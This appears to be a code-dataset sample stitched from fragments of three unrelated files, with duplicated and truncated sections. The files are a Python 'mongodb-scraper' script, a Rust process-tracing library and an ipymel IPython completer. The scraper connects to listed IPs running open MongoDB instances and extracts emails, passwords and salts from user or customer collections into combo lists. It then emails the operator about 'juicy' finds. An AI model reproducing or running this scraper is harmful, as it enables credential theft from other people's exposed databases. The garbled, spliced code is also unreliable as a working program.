size = 0
if os.path.exists('data/' + self.filename):
size = os.path.getsize('data/' + self.filename)
# Did the file grow too large?
if size > (20 * 1024 * 1024):
i = 0
while i < 100:
i += 1
combo_file = 'combo_' + str(i) + '.txt'
if not os.path.exists('data/' + combo_file):
self.filename = combo_file
break
def scrape(self):
for ip in self.ips:
# Have I already processed this IP?
if ip in self.processed:
continue
self.logger.info("Connecting to " + ip)
try:
client = MongoClient(ip, connectTimeoutMS=5000)
dbs = client.database_names()
except (KeyboardInterrupt, SystemExit):
return
except:
self.logger.warning("An error occurred while connecting to " + ip + ". Skipping")
# Don't cry if we can't connect to the server
self.processed.append(ip)
continue
for db in dbs:
# Skip local system databases
if db in ['admin', 'local']:
continue
self.logger.debug("\t\tAnalyzing db: " + db)
o_db = client[db]
try:
collections = o_db.collection_names()
except (KeyboardInterrupt, SystemExit):
return
except Exception:
# Don't cry if something bad happens
self.logger.warning("\tAn error occurred while fetching collections from " + ip + ". Skipping.")
break
for collection in collections:
if collection in ['system.indexes']:
continue
self.logger.debug("\t\tAnalyzing collection: " + collection)
# Is this a collection I'm interested in?
if not any(table in collection for table in self.table_names):
continue
o_coll = o_db[collection]
try:
row = o_coll.find_one()
except:
# Sometimes the collection is broken, let's skip it
continue
interesting = False
# If the collection is empty I get a null row
if row:
for key, value in row.iteritems():
# Is that a column we're interested in?
if any(column in key for column in self.column_names):
# Only consider plain strings, nothing fancy
if isinstance(value, basestring):
interesting = True
break
# This collection has no interesting data? Let's skip it
if not interesting:
continue
self.logger.info("** Table with interesting data found")
# Check if the current data file is too large
self._check_datafile()
# Ok there is interesting data inside it. Let's find if there is an email address, too
# I'll just check the first record and hope there is something similar to an email address.
email_field = ''
salt_field = ''
for key, value in row.iteritems():
# If we find anything that resembles an email address, let's store it
if isinstance(value, basestring):
try:
if re.match(self.email_regex, value.encode('utf-8')):
email_field = key
if 'salt' in key.lower():
salt_field = key
except UnicodeDecodeError:
pass
rows = o_coll.find(batch_size=500).max_time_ms(10000)
total = rows.count()
if total > 750:
self.logger.info("***FOUND COLLECTION WITH " + '{:,}'.format(total) + " RECORDS. JUICY!!")
self._notify(ip, collection, total)
lines = []
counter = 0
try:
for row in rows:
counter += 1
try:
email = row[email_field].encode('utf-8')
if not email:
email = ''
except:
email = ''
# Try to fetch the salt, if any
try:
salt = row[salt_field].encode('utf-8')
if not salt:
salt = ''
except:
salt = ''
for key, value in row.iteritems():
try:
# Skip fields marked as emails / salt
if key in [email_field, salt_field]:
continue
# Is that a column we're interested in?
if any(column in key for column in self.column_names):
# Skip empty values
if not value:
continue
# Skip fields that are not strings (ie reset_pass_date => datetime object)
if not isinstance(value, basestring):
continue
value = value.encode('utf-8') + ':' + salt
lines.append(unicode(ip.encode('utf-8') + '|' + email + ':' + value + '\n'))
except UnicodeDecodeError:
# You know what? I'm done dealing with all those crazy encodings
self.logger.warn("An error occurred while encoding the string. Skipping")
continue
# If I get a very long list, let's write it in batches
if len(lines) >= 1000:
self.logger.info("\ | if not os.path.exists('data'):
os.makedirs('data') | random_line_split |
mongodb-scraper.py | ed = []
self.table_names = ['account', 'user', 'subscriber', 'customer']
self.column_names = ['pass', 'pwd']
self.email_regex = re.compile(r'[a-z0-9\-\._]+@[a-z0-9\-\.]+\.[a-z]{2,4}')
self.filename = 'combo.txt'
# Init the logger
self.logger = logging.getLogger('mongodb-scraper')
self.logger.setLevel(logging.DEBUG)
# Create a rotating file handler, so we won't have an endless log file
rotate = logging.handlers.RotatingFileHandler(
'mongodb-scraper.log', maxBytes=(5 * 1024 * 1024), backupCount=3)
rotate.setLevel(logging.DEBUG)
formatter = logging.Formatter('%(asctime)s|%(levelname)-8s| %(message)s')
rotate.setFormatter(formatter)
self.logger.addHandler(rotate)
console = logging.StreamHandler()
console.setLevel(logging.INFO)
formatter = ColoredFormatter("%(log_color)s%(asctime)s|[%(levelname)-4s] %(message)s%(reset)s", "%H:%M:%S")
console.setFormatter(formatter)
self.logger.addHandler(console)
# Check that the data dir exists
if not os.path.exists('data'):
os.makedirs('data')
# Load previous data
self._load_data()
# Let's parse some CLI options
parser = argparse.ArgumentParser()
parser.add_argument('-s', '--skip', help='Supply a comma separated string of IPs that should be skipped')
arguments = parser.parse_args()
if arguments.skip:
skip = arguments.skip.split(',')
self.processed += skip
# Load settings
self._load_settings()
def _load_data(self):
self.logger.info("Opening data")
try:
with open('data.json', 'r') as data_json:
self.ips = json.load(data_json)
except (IOError, ValueError):
raise RuntimeError("Please provide a valid JSON encoded file in data.json")
self.logger.info("Found " + str(len(self.ips)) + " IPs to connect")
try:
with open('processed.json', 'r') as processed_json:
self.processed = json.load(processed_json)
except (IOError, ValueError):
# Meh, I'll live with that...
pass
if self.processed:
self.logger.info("Found " + str(len(self.processed)) + " already processed IP")
def _load_settings(self):
try:
with open('settings.json', 'r') as settings_json:
self.settings = json.load(settings_json)
self.logger.info("Settings file found")
except (IOError, ValueError):
self.logger.info("Settings file not found")
def _notify(self, ip, collection, count):
try:
threshold = self.settings['email']['threshold']
except KeyError:
# No key set
return
# Result is not interesting enough
if count < threshold:
return
# Do I have all the required strings?
try:
email_from = self.settings['email']['from']
email_to = self.settings['email']['to']
host = self.settings['email']['smtp']['host']
port = self.settings['email']['smtp']['port']
user = self.settings['email']['smtp']['user']
password = self.settings['email']['smtp']['password']
except KeyError:
return
# Ok, but are they really set?
if not all([email_from, email_to, host, port, user, password]):
return
# Ok, we're good to go
body = """
Hi Dude!
I have just found a juicy collection!
IP: {0}
Collection: {1}
Rows: {2}
"""
body = body.format(ip, collection, count)
mailer = smtplib.SMTP(host, str(port), timeout=10)
mailer.starttls()
mailer.login(user=user, password=password)
message = MIMEText(body)
message['Subject'] = 'Juicy collection at ' + ip
message['From'] = email_from
message['To'] = email_to
try:
mailer.sendmail(email_from, [email_to], message.as_string())
mailer.quit()
except smtplib.SMTPException:
return
def _check_datafile(self):
size = 0
if os.path.exists('data/' + self.filename):
size = os.path.getsize('data/' + self.filename)
# Did the file grow too large?
if size > (20 * 1024 * 1024):
i = 0
while i < 100:
i += 1
combo_file = 'combo_' + str(i) + '.txt'
if not os.path.exists('data/' + combo_file):
self.filename = combo_file
break
def scrape(self):
for ip in self.ips:
# Have I already processed this IP?
|
self.logger.debug("\t\tAnalyzing db: " + db)
o_db = client[db]
try:
collections = o_db.collection_names()
except (KeyboardInterrupt, SystemExit):
return
except Exception:
# Don't cry if something bad happens
self.logger.warning("\tAn error occurred while fetching collections from " + ip + ". Skipping.")
break
for collection in collections:
if collection in ['system.indexes']:
continue
self.logger.debug("\t\tAnalyzing collection: " + collection)
# Is this a collection I'm interested in?
if not any(table in collection for table in self.table_names):
continue
o_coll = o_db[collection]
try:
row = o_coll.find_one()
except:
# Sometimes the collection is broken, let's skip it
continue
interesting = False
# If the collection is empty I get a null row
if row:
for key, value in row.iteritems():
# Is that a column we're interested in?
if any(column in key for column in self.column_names):
# Only consider plain strings, nothing fancy
if isinstance(value, basestring):
interesting = True
break
# This collection has no interesting data? Let's skip it
if not interesting:
continue
self.logger.info("** Table with interesting data found")
# Check if the current data file is too large
self._check_datafile()
# Ok there is interesting data inside it. Let's find if there is an email address, too
# I'll just check the first record and hope there is something similar to an email address.
email_field = ''
salt_field = ''
for key, value in row.iteritems():
# If we find anything that resembles an email address, let's store it
if isinstance(value, basestring):
try:
if re.match(self.email_regex, value.encode('utf-8')):
email_field = key
if 'salt' in key.lower():
salt_field = key
except UnicodeDecodeError:
pass
rows = o_coll.find(batch_size=500).max_time_ms(10000)
total = rows.count()
if total > 750:
self.logger.info("***FOUND COLLECTION WITH " + '{:,}'.format(total) + " RECORDS. JUICY!!")
self._notify(ip, collection, total)
lines = []
counter = 0
try:
for row in rows:
counter += 1
try:
email = row[email_field].encode('utf-8')
if not email:
email = ''
except:
email = ''
# Try to fetch the salt, if any
try:
salt = row[salt_field].encode('utf-8')
if not salt:
salt = ''
except:
salt = ''
for key, value in row.iteritems():
try:
# Skip fields marked as emails / salt
if key in [email_field, salt_field]:
continue
# Is that a column we're interested in?
if any(column in key for column in self.column_names):
# Skip empty values
if not value:
continue
# Skip fields that are not strings (ie reset_pass_date => datetime object)
if not isinstance(value, basestring):
continue
value = value.encode('utf-8') + ':' + salt
lines.append(unicode(ip.encode('utf-8') + '|' + email + ':' + value + '\n'))
except UnicodeDecodeError:
# You know what? I'm done dealing with all those crazy encodings
self.logger.warn("An error occurred while encoding the string. Skipping")
continue
# If I get a very long list, let's write it in batches
if len(lines) >= 1000:
self.logger.info("\ | if ip in self.processed:
continue
self.logger.info("Connecting to " + ip)
try:
client = MongoClient(ip, connectTimeoutMS=5000)
dbs = client.database_names()
except (KeyboardInterrupt, SystemExit):
return
except:
self.logger.warning("An error occurred while connecting to " + ip + ". Skipping")
# Don't cry if we can't connect to the server
self.processed.append(ip)
continue
for db in dbs:
# Skip local system databases
if db in ['admin', 'local']:
continue | conditional_block |
lib.rs | }
}
pub type Pid = usize;
#[derive(Clone, Copy, Debug)]
pub struct IntRegisters(pub syscall::IntRegisters);
impl IntRegisters {
pub fn format_syscall_bare(&self) -> String {
arch::format_syscall(None, &self)
}
pub fn format_syscall_full(&self, mem: &mut Memory) -> String {
arch::format_syscall(Some(mem), &self)
}
pub fn return_value(&self) -> usize {
arch::return_value(&self)
}
}
impl Deref for IntRegisters {
type Target = syscall::IntRegisters;
fn deref(&self) -> &Self::Target {
&self.0
}
}
impl DerefMut for IntRegisters {
fn deref_mut(&mut self) -> &mut Self::Target {
&mut self.0
}
}
#[derive(Clone, Copy, Debug)]
pub struct FloatRegisters(pub syscall::FloatRegisters);
impl Deref for FloatRegisters {
type Target = syscall::FloatRegisters;
fn deref(&self) -> &Self::Target {
&self.0
}
}
impl DerefMut for FloatRegisters {
fn deref_mut(&mut self) -> &mut Self::Target {
&mut self.0
}
}
#[derive(Clone, Debug, PartialEq, Eq, Hash)]
pub enum EventData {
EventClone(usize),
StopSignal(usize, usize),
StopExit(usize),
Unknown(usize, usize, usize, usize, usize, usize),
}
#[derive(Clone, Debug, PartialEq, Eq, Hash)]
pub struct Event {
pub cause: Flags,
pub data: EventData,
}
impl Event {
pub fn new(inner: syscall::PtraceEvent) -> Self {
Self {
cause: Flags::from_bits_truncate(inner.cause.bits()),
data: match inner.cause {
syscall::PTRACE_EVENT_CLONE => EventData::EventClone(inner.a),
syscall::PTRACE_STOP_SIGNAL => EventData::StopSignal(inner.a, inner.b),
syscall::PTRACE_STOP_EXIT => EventData::StopExit(inner.a),
_ => EventData::Unknown(inner.a, inner.b, inner.c, inner.d, inner.e, inner.f),
},
}
}
}
pub struct Registers {
pub float: File,
pub int: File,
}
impl Registers {
pub fn attach(pid: Pid) -> Result<Self> {
Ok(Self {
float: File::open(format!("proc:{}/regs/float", pid))?,
int: File::open(format!("proc:{}/regs/int", pid))?,
})
}
pub fn get_float(&mut self) -> Result<FloatRegisters> {
let mut regs = syscall::FloatRegisters::default();
trace!(self.float.read(&mut regs)?, ®s);
Ok(FloatRegisters(regs))
}
pub fn set_float(&mut self, regs: &FloatRegisters) -> Result<()> {
trace!(self.float.write(®s)?, ®s);
Ok(())
}
pub fn get_int(&mut self) -> Result<IntRegisters> {
let mut regs = syscall::IntRegisters::default();
trace!(self.int.read(&mut regs)?, ®s);
Ok(IntRegisters(regs))
}
pub fn set_int(&mut self, regs: &IntRegisters) -> Result<()> {
trace!(self.int.write(®s)?, ®s);
Ok(())
}
}
impl fmt::Debug for Registers {
fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
write!(f, "Registers(...)")
}
}
pub struct Memory {
pub file: File,
}
impl Memory {
pub fn attach(pid: Pid) -> Result<Self> {
Ok(Self {
file: File::open(format!("proc:{}/mem", pid))?,
})
}
pub fn read(&mut self, address: *const u8, memory: &mut [u8]) -> Result<()> {
self.file.seek(SeekFrom::Start(address as u64))?;
self.file.read_exact(memory)?;
trace!(memory);
Ok(())
}
pub fn write(&mut self, address: *const u8, memory: &[u8]) -> Result<()> {
self.file.seek(SeekFrom::Start(address as u64))?;
self.file.write_all(memory)?;
trace!(memory);
Ok(())
}
/// Writes a software breakpoint to the specified memory address, and
/// returns the previous instruction.
pub fn set_breakpoint(&mut self, address: *const u8) -> Result<u8> {
let mut previous = [0];
self.read(address, &mut previous)?;
arch::set_breakpoint(self, address)?;
Ok(previous[0])
}
pub fn cursor(&mut self) -> Result<u64> {
self.file.seek(SeekFrom::Current(0))
}
}
impl fmt::Debug for Memory {
fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
write!(f, "Memory(...)")
}
}
pub struct Tracer {
pub file: File,
pub regs: Registers,
pub mem: Memory,
}
impl Tracer {
/// Attach a tracer to the process with the specified PID. This will stop it.
pub fn attach(pid: Pid) -> Result<Self> {
Ok(Self {
file: OpenOptions::new()
.read(true)
.write(true)
.truncate(true)
.open(format!("proc:{}/trace", pid))?,
regs: Registers::attach(pid)?,
mem: Memory::attach(pid)?,
})
}
/// Set a breakpoint on the next specified stop, and wait for the
/// breakpoint to be reached. For convenience in the majority of
/// use-cases, this panics on non-breakpoint events and returns
/// the breaking event whenever the first matching breakpoint is
/// hit. For being able to use non-breakpoint events, see the
/// `next_event` function.
pub fn next(&mut self, flags: Flags) -> Result<Event> {
self.next_event(flags)?.from_callback(|event| {
panic!(
"`Tracer::next` should never be used to handle non-breakpoint events, see \
`Tracer::next_event` instead. Event: {:?}",
event
)
})
}
/// Similarly to `next`, but instead of conveniently returning a | /// breakpoint event, it returns an event handler that lets you
/// handle events yourself.
pub fn next_event(&mut self, flags: Flags) -> Result<EventHandler> {
trace!(flags, self.file.write(&flags.bits().to_ne_bytes())?);
Ok(EventHandler { inner: self })
}
/// Convert this tracer to be nonblocking. Setting breakpoints
/// will no longer wait by default, but you will gain access to a
/// `wait` function which will do the same as in blocking
/// mode. Useful for multiplexing tracers using the `event:`
/// scheme.
pub fn nonblocking(self) -> Result<NonblockTracer> {
let old_flags = e(syscall::fcntl(
self.file.as_raw_fd() as usize,
syscall::F_GETFL,
0,
))?;
let new_flags = old_flags | syscall::O_NONBLOCK;
e(syscall::fcntl(
self.file.as_raw_fd() as usize,
syscall::F_SETFL,
new_flags,
))?;
Ok(NonblockTracer {
old_flags: Some(old_flags),
inner: self,
})
}
/// Same as `EventHandler::iter`, but does not rely on having an
/// event handler. When only using a blocking tracer you shouldn't
/// need to worry about this.
pub fn events(&self) -> Result<impl Iterator<Item = Result<Event>>> {
let mut buf = [MaybeUninit::<syscall::PtraceEvent>::uninit(); 4];
let mut i = 0;
let mut len = 0;
// I don't like this clone, but I don't want tracer.events()
// to prevent tracer from being borrowed again.
let mut file = self.file.try_clone()?;
Ok(iter::from_fn(move || {
if i >= len {
len = match file.read(unsafe {
slice::from_raw_parts_mut(
buf.as_mut_ptr() as *mut u8,
buf.len() * mem::size_of::<syscall::PtraceEvent>(),
)
}) {
Ok(n) => n / mem::size_of::<syscall::PtraceEvent>(),
Err(err) => return Some(Err(err)),
};
if len == 0 {
return None;
}
i = 0;
}
let ret = Event::new(unsafe { ptr::read(buf[i].as_mut_ptr()) });
trace!(&ret);
i += 1;
Some(Ok(ret))
}))
}
}
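// Typical use of this API, as suggested by the methods above: attach to a
// process with Tracer::attach(pid) (which stops it), request the next stop
// with next()/next_event() and the appropriate Flags, then inspect or patch
// the tracee through the `regs` and `mem` fields before issuing the next
// breakpoint request.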
impl fmt::Debug for Tracer {
fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
write!(f, "Tracer(...)")
}
}
#[must_use = "The tracer won't block unless you wait for events"]
pub struct EventHandler<'a> {
inner: &'a mut Tracer,
}
impl<'a> EventHandler<'a> {
/// Pop one event. Prefer the use of the `iter` function instead
/// as it batches reads. Only reason for this would be | random_line_split |
|
lib.rs | }
}
pub type Pid = usize;
#[derive(Clone, Copy, Debug)]
pub struct IntRegisters(pub syscall::IntRegisters);
impl IntRegisters {
pub fn format_syscall_bare(&self) -> String {
arch::format_syscall(None, &self)
}
pub fn format_syscall_full(&self, mem: &mut Memory) -> String {
arch::format_syscall(Some(mem), &self)
}
pub fn return_value(&self) -> usize {
arch::return_value(&self)
}
}
impl Deref for IntRegisters {
type Target = syscall::IntRegisters;
fn deref(&self) -> &Self::Target {
&self.0
}
}
impl DerefMut for IntRegisters {
fn deref_mut(&mut self) -> &mut Self::Target {
&mut self.0
}
}
#[derive(Clone, Copy, Debug)]
pub struct FloatRegisters(pub syscall::FloatRegisters);
impl Deref for FloatRegisters {
type Target = syscall::FloatRegisters;
fn deref(&self) -> &Self::Target {
&self.0
}
}
impl DerefMut for FloatRegisters {
fn deref_mut(&mut self) -> &mut Self::Target {
&mut self.0
}
}
#[derive(Clone, Debug, PartialEq, Eq, Hash)]
pub enum EventData {
EventClone(usize),
StopSignal(usize, usize),
StopExit(usize),
Unknown(usize, usize, usize, usize, usize, usize),
}
#[derive(Clone, Debug, PartialEq, Eq, Hash)]
pub struct Event {
pub cause: Flags,
pub data: EventData,
}
impl Event {
pub fn new(inner: syscall::PtraceEvent) -> Self {
Self {
cause: Flags::from_bits_truncate(inner.cause.bits()),
data: match inner.cause {
syscall::PTRACE_EVENT_CLONE => EventData::EventClone(inner.a),
syscall::PTRACE_STOP_SIGNAL => EventData::StopSignal(inner.a, inner.b),
syscall::PTRACE_STOP_EXIT => EventData::StopExit(inner.a),
_ => EventData::Unknown(inner.a, inner.b, inner.c, inner.d, inner.e, inner.f),
},
}
}
}
pub struct Registers {
pub float: File,
pub int: File,
}
impl Registers {
pub fn attach(pid: Pid) -> Result<Self> {
Ok(Self {
float: File::open(format!("proc:{}/regs/float", pid))?,
int: File::open(format!("proc:{}/regs/int", pid))?,
})
}
pub fn get_float(&mut self) -> Result<FloatRegisters> {
let mut regs = syscall::FloatRegisters::default();
trace!(self.float.read(&mut regs)?, ®s);
Ok(FloatRegisters(regs))
}
pub fn set_float(&mut self, regs: &FloatRegisters) -> Result<()> {
trace!(self.float.write(®s)?, ®s);
Ok(())
}
pub fn get_int(&mut self) -> Result<IntRegisters> {
let mut regs = syscall::IntRegisters::default();
trace!(self.int.read(&mut regs)?, ®s);
Ok(IntRegisters(regs))
}
pub fn set_int(&mut self, regs: &IntRegisters) -> Result<()> {
trace!(self.int.write(®s)?, ®s);
Ok(())
}
}
impl fmt::Debug for Registers {
fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
write!(f, "Registers(...)")
}
}
pub struct Memory {
pub file: File,
}
impl Memory {
pub fn attach(pid: Pid) -> Result<Self> {
Ok(Self {
file: File::open(format!("proc:{}/mem", pid))?,
})
}
pub fn read(&mut self, address: *const u8, memory: &mut [u8]) -> Result<()> {
self.file.seek(SeekFrom::Start(address as u64))?;
self.file.read_exact(memory)?;
trace!(memory);
Ok(())
}
pub fn write(&mut self, address: *const u8, memory: &[u8]) -> Result<()> {
self.file.seek(SeekFrom::Start(address as u64))?;
self.file.write_all(memory)?;
trace!(memory);
Ok(())
}
/// Writes a software breakpoint to the specified memory address, and
/// returns the previous instruction.
pub fn set_breakpoint(&mut self, address: *const u8) -> Result<u8> {
let mut previous = [0];
self.read(address, &mut previous)?;
arch::set_breakpoint(self, address)?;
Ok(previous[0])
}
pub fn cursor(&mut self) -> Result<u64> {
self.file.seek(SeekFrom::Current(0))
}
}
impl fmt::Debug for Memory {
fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
write!(f, "Memory(...)")
}
}
pub struct | {
pub file: File,
pub regs: Registers,
pub mem: Memory,
}
impl Tracer {
/// Attach a tracer to the process with the specified PID. This will stop the process.
pub fn attach(pid: Pid) -> Result<Self> {
Ok(Self {
file: OpenOptions::new()
.read(true)
.write(true)
.truncate(true)
.open(format!("proc:{}/trace", pid))?,
regs: Registers::attach(pid)?,
mem: Memory::attach(pid)?,
})
}
/// Set a breakpoint on the next specified stop, and wait for the
/// breakpoint to be reached. For convenience in the majority of
/// use-cases, this panics on non-breakpoint events and returns
/// the breaking event whenever the first matching breakpoint is
/// hit. For being able to use non-breakpoint events, see the
/// `next_event` function.
pub fn next(&mut self, flags: Flags) -> Result<Event> {
self.next_event(flags)?.from_callback(|event| {
panic!(
"`Tracer::next` should never be used to handle non-breakpoint events, see \
`Tracer::next_event` instead. Event: {:?}",
event
)
})
}
/// Similarly to `next`, but instead of conveniently returning a
/// breakpoint event, it returns an event handler that lets you
/// handle events yourself.
pub fn next_event(&mut self, flags: Flags) -> Result<EventHandler> {
trace!(flags, self.file.write(&flags.bits().to_ne_bytes())?);
Ok(EventHandler { inner: self })
}
/// Convert this tracer to be nonblocking. Setting breakpoints
/// will no longer wait by default, but you will gain access to a
/// `wait` function which will do the same as in blocking
/// mode. Useful for multiplexing tracers using the `event:`
/// scheme.
pub fn nonblocking(self) -> Result<NonblockTracer> {
let old_flags = e(syscall::fcntl(
self.file.as_raw_fd() as usize,
syscall::F_GETFL,
0,
))?;
let new_flags = old_flags | syscall::O_NONBLOCK;
e(syscall::fcntl(
self.file.as_raw_fd() as usize,
syscall::F_SETFL,
new_flags,
))?;
Ok(NonblockTracer {
old_flags: Some(old_flags),
inner: self,
})
}
/// Same as `EventHandler::iter`, but does not rely on having an
/// event handler. When only using a blocking tracer you shouldn't
/// need to worry about this.
pub fn events(&self) -> Result<impl Iterator<Item = Result<Event>>> {
let mut buf = [MaybeUninit::<syscall::PtraceEvent>::uninit(); 4];
let mut i = 0;
let mut len = 0;
// I don't like this clone, but I don't want tracer.events()
// to prevent tracer from being borrowed again.
let mut file = self.file.try_clone()?;
Ok(iter::from_fn(move || {
if i >= len {
len = match file.read(unsafe {
slice::from_raw_parts_mut(
buf.as_mut_ptr() as *mut u8,
buf.len() * mem::size_of::<syscall::PtraceEvent>(),
)
}) {
Ok(n) => n / mem::size_of::<syscall::PtraceEvent>(),
Err(err) => return Some(Err(err)),
};
if len == 0 {
return None;
}
i = 0;
}
let ret = Event::new(unsafe { ptr::read(buf[i].as_mut_ptr()) });
trace!(&ret);
i += 1;
Some(Ok(ret))
}))
}
}
impl fmt::Debug for Tracer {
fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
write!(f, "Tracer(...)")
}
}
#[must_use = "The tracer won't block unless you wait for events"]
pub struct EventHandler<'a> {
inner: &'a mut Tracer,
}
impl<'a> EventHandler<'a> {
/// Pop one event. Prefer the use of the `iter` function instead
/// as it batches reads. Only reason for this would | Tracer | identifier_name |
ipymel.py | # and DAG_COMPLETER_RE, since those are simply more restrictive versions,
# which set "dagOnly"
# print "text_until_cursor: {}".format(event.text_until_cursor)
# print "symbol: {}".format(event.symbol)
linematch = NAME_COMPLETER_RE.match(event.text_until_cursor)
# print "linematch: {}".format(linematch.group(0))
nametext = linematch.group('namematch')
# print "nametext: {}".format(nametext)
matches = None
#--------------
# Attributes
#--------------
if not dagOnly:
attr_match = ATTR_RE.match(nametext)
else:
attr_match = None
if attr_match:
node, attr = attr_match.groups()
if node == 'SCENE':
res = api_ls(attr + '*', dagOnly)
if res:
matches = ['SCENE.' + x for x in res if '|' not in x]
elif node.startswith('SCENE.'):
node = node.replace('SCENE.', '')
matches = ['SCENE.' + x for x in complete_node_with_attr(node, attr) if '|' not in x]
else:
matches = complete_node_with_attr(node, attr)
#--------------
# Nodes
#--------------
else:
# we don't yet have a full node
if '|' not in nametext or (nametext.startswith('|') and nametext.count('|') == 1):
# print "partial node"
kwargs = {}
if nametext.startswith('|'):
kwargs['long'] = True
matches = api_ls(expand(nametext), dagOnly, **kwargs)
# we have a full node, get its children
else:
matches = get_children(nametext, dagOnly)
if not matches:
raise TryNext
# if we have only one match, get the children as well
if len(matches) == 1 and not attr_match:
res = get_children(matches[0] + '|', dagOnly)
matches += res
if event.symbol != nametext:
# in some situations, the event.symbol will only have incomplete
# information - ie, if we are completing "persp|p", then the symbol will
# be "p" - nametext will give us the full "persp|p", which we need so we
# know we're checking for children of "persp". In these situations, we
# need to STRIP the leading non-symbol portion, so we don't end up with
# "persp|persp|perspShape" after completion.
if nametext.endswith(event.symbol):
if not event.symbol:
preSymbol = nametext
else:
preSymbol = nametext[:-len(event.symbol)]
matches = [x[len(preSymbol):] if x.startswith(preSymbol) else x
for x in matches]
# HOWEVER - in other situations, the symbol will contain too much
# information - ie, stuff that isn't strictly speaking a node name - such
# as when we complete "SCENE.p". In this case, the symbol is "SCENE.p",
# whereas nametext is simply "p". In such cases, we need to PREPEND the
# extra "SCENE." to the result, or else ipython will think our matches
# are not actually matches...
elif event.symbol.endswith(nametext):
if not nametext:
symbolPrefix = event.symbol
else:
symbolPrefix = event.symbol[:-len(nametext)]
matches = [symbolPrefix + x for x in matches]
return matches
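# Hedged sketch only (not the module's actual wiring): the completers above are
# meant to be registered with IPython's `complete_command` hook. The function
# name and the `re_key` patterns below are illustrative assumptions; the real
# ipymel setup code (not shown in this excerpt) chooses its own trigger
# expressions.
def _register_pymel_completers(ip):
    # Attribute-style completion on PyNode / Attribute objects held in Python.
    ip.set_hook('complete_command', pymel_python_completer, re_key=r'.+\.\w*$')
    # Node-path completion for SCENE.<node> and 'a|b|c' style DAG strings.
    ip.set_hook('complete_command', pymel_name_completer, re_key=r'.*')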
PYTHON_TOKEN_RE = re.compile(r"(\S+(\.\w+)*)\.(\w*)$")
def pymel_python_completer(self, event):
"""Match attributes or global python names"""
import pymel.core as pm
# print "python_matches"
text = event.symbol
# print repr(text)
# Another option, seems to work great. Catches things like ''.<tab>
m = PYTHON_TOKEN_RE.match(text)
if not m:
raise TryNext
expr, attr = m.group(1, 3)
# print type(self.Completer), dir(self.Completer)
# print self.Completer.namespace
# print self.Completer.global_namespace
try:
# print "first"
obj = eval(expr, self.Completer.namespace)
except Exception:
try:
# print "second"
obj = eval(expr, self.Completer.global_namespace)
except Exception:
raise TryNext
# print "complete"
if isinstance(obj, (pm.nt.DependNode, pm.Attribute)):
# print "isinstance"
node = str(obj)
long_attrs = api_listAttr(node)
short_attrs = api_listAttr(node, shortNames=1)
matches = []
matches = self.Completer.python_matches(text)
# print "here"
# if node is a plug ( 'persp.t' ), the first result will be the passed plug
if '.' in node:
attrs = long_attrs[1:] + short_attrs[1:]
else:
attrs = long_attrs + short_attrs
# print "returning"
matches += [expr + '.' + at for at in attrs]
#import colorize
#matches = [ colorize.colorize(x,'magenta') for x in matches ]
return matches
raise TryNext
def buildRecentFileMenu():
import pymel.core as pm
if "RecentFilesList" not in pm.optionVar:
return
# get the list
RecentFilesList = pm.optionVar["RecentFilesList"]
nNumItems = len(RecentFilesList)
RecentFilesMaxSize = pm.optionVar["RecentFilesMaxSize"]
# # check if there are too many items in the list
# if (RecentFilesMaxSize < nNumItems):
#
# #if so, truncate the list
# nNumItemsToBeRemoved = nNumItems - RecentFilesMaxSize
#
# #Begin removing items from the head of the array (least recent file in the list)
# for ($i = 0; $i < $nNumItemsToBeRemoved; $i++):
#
# core.optionVar -removeFromArray "RecentFilesList" 0;
#
# RecentFilesList = core.optionVar["RecentFilesList"]
# nNumItems = len($RecentFilesList);
# The RecentFilesTypeList optionVar may not exist since it was
# added after the RecentFilesList optionVar. If it doesn't exist,
# we create it and initialize it with a guess at the file type
if nNumItems > 0:
if "RecentFilesTypeList" not in pm.optionVar:
pm.mel.initRecentFilesTypeList(RecentFilesList)
RecentFilesTypeList = pm.optionVar["RecentFilesTypeList"]
# toNativePath
# first, check if we are the same.
def open_completer(self, event):
relpath = event.symbol
# print event # dbg
if '-b' in event.line:
# return only bookmark completions
bkms = self.db.get('bookmarks', {})
return list(bkms.keys())
if event.symbol == '-':
width_dh = str(len(str(len(ip.user_ns['_sh']) + 1)))
# jump in directory history by number
fmt = '-%0' + width_dh + 'd [%s]'
ents = [fmt % (i, s) for i, s in enumerate(ip.user_ns['_sh'])]
if len(ents) > 1:
return ents
return []
raise TryNext
class TreePager(object):
def __init__(self, colors, options):
self.colors = colors
self.options = options
# print options.depth
def do_level(self, obj, depth, isLast):
if isLast[-1]:
sep = '`-- '
else:
sep = '|-- '
#sep = '|__ '
depth += 1
branch = ''
for x in isLast[:-1]:
if x:
branch += ' '
else:
branch += '| '
branch = self.colors['tree'] + branch + sep + self.colors['normal']
children = self.getChildren(obj)
name = self.getName(obj)
num = len(children) - 1
if children:
if self.options.maxdepth and depth >= self.options.maxdepth:
state = '+'
else:
state = '-'
pre = self.colors['collapsed'] + state + ' '
else:
pre = ' '
yield pre + branch + name + self.colors['normal'] + '\n'
# yield Colors.Yellow + branch + sep + Colors.Normal+ name + '\n'
if not self.options.maxdepth or depth < self.options.maxdepth:
for i, x in enumerate(children):
for line in self.do_level(x, depth, isLast + [i == num]):
yield line
def make_tree(self, roots):
| num = len(roots) - 1
tree = ''
for i, x in enumerate(roots):
for line in self.do_level(x, 0, [i == num]):
tree += line
return tree | identifier_body |
|
ipymel.py | ):
for line in self.do_level(x, depth, isLast + [i == num]):
yield line
def make_tree(self, roots):
num = len(roots) - 1
tree = ''
for i, x in enumerate(roots):
for line in self.do_level(x, 0, [i == num]):
tree += line
return tree
class DagTree(TreePager):
def getChildren(self, obj):
if self.options.shapes:
return obj.getChildren()
else:
return obj.getChildren(type='transform')
def getName(self, obj):
import pymel.core as pm
name = obj.nodeName()
if obj.isInstanced():
if isinstance(obj, pm.nt.Transform):
# keep transforms bolded
color = self.colors['nonunique_transform']
else:
color = self.colors['nonunique']
id = obj.instanceNumber()
if id != 0:
source = ' -> %s' % obj.getOtherInstances()[0]
else:
source = ''
name = color + name + self.colors['instance'] + ' [' + str(id) + ']' + source
elif not obj.isUniquelyNamed():
if isinstance(obj, pm.nt.Transform):
# keep transforms bolded
color = self.colors['nonunique_transform']
else:
color = self.colors['nonunique']
name = color + name
elif isinstance(obj, pm.nt.Transform):
# bold
name = self.colors['transform'] + name
else:
